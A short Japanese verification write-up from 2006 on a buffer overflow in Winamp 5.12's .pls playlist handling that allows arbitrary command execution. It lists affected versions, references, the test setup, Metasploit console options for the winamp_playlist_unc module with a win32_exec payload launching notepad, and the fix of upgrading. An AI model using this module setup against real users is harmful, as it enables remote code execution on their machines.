Nullsoft Winamp Player <= 5.12 PLS File Handling Remote Buffer Overflow Exploit

• 2006/03/08　初版
  • Author kikuzou

• Winampのプレイリスト(.pls)に buffer overflow の問題があり、任意のコマンドが実行可能
• 2006/01/30 公開

• Winamp = < 5.13 バージョン
  • v5.13 で修正されたと思われていたが、問題が残っていた模様
    • bugtraq ML :: New winamp m3u/pls .WMA & .M3U Extension overflows

• Secunia :: Winamp Three Playlist Parsing Buffer Overflow Vulnerabilities

• Windows XP SP2 日本語版
• Winamp 5.12 (日本語化パッチ適用済み)

• 任意のコマンドが実行可能
• 検証の様子については、「デモンストレーション」参照
• Metasploit を使用して、検証用plsファイルを作成
• オプションは以下のとおり

msf winamp_playlist_unc(win32_exec) > show options

Exploit and Payload Options
===========================

  Exploit:    Name        Default    Description
  --------    --------    -------    -------------------------------------------    
  optional    REALHOST               External address to use for redirects (NAT)
  optional    HTTPHOST    0.0.0.0    The local HTTP listener host
  required    HTTPPORT    8080       The local HTTP listener port
  
  Payload:    Name        Default                         Description
  --------    --------    ----------------------------    ------------------------------------------    
  required    EXITFUNC    process                         Exit technique: "process", "thread", "seh"
  required    CMD         cmd.exe /c start notepad.exe    The command string to execute
  
  Target: Winamp 5.12 Universal

msf winamp_playlist_unc(win32_exec) > 

1. Winamp 5.2 へのバージョンアップ